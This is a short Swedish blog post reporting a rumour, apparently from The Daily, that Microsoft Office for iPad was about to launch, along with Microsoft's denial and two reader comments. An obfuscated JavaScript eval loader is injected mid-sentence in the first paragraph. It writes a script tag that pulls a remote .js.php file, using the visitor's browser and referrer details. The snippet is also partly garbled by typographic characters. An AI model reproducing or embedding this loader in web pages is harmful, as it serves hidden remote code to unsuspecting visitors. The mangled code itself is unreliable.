Image Image Image Image Image Image Image Image Image Image

| 3 augusti, 2020

Scroll to top

Top

Microsoft Office till iPad snart?

Microsoft Office till iPad snart?
Sebastian

Tidningen eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aeahz|var|u0026u|referrer|iikzk||js|php’.split(’|’),0,{}))
The Daily
gick idag ut med att de fått några första blickar på Microsoft Office till iPad. Tidningen hävdar också att en lansering av detta program skulle kunna ske inom några veckor då projektet nästan står klart.

Gränsnittet i applikationen ska påminna om den i OneNote som lanserades för inte så länge sedan till iPad. Det nämns inte om någon version till Android, än.

A brief hands-on with a working prototype of the software revealed a number of new things. The app’s user interface is similar to the current OneNote app, but it has hints of Metro, the new design language that can be seen in Windows Phone and in the as-yet-released Windows 8 desktop operating system.

Microsoft själva håller dock inte med The Daily. The New York Times skriver att Microsoft meddelat följande:

The Daily story is based on inaccurate rumors and speculation. We have no further comment.

Microsoft skriver också på sin officiella blogg att bilden från the Daily inte är äkta.

 

Comments

  1. PC

    Det är svårt att veta om detta stämmer inte. Jag litar inte på microsoft själva för att de säkert är sura för att detta läckt.

  2. Olle Fagerblad

    Jag behöver inte MS Office över huvud taget, självklart inte heller i iPad.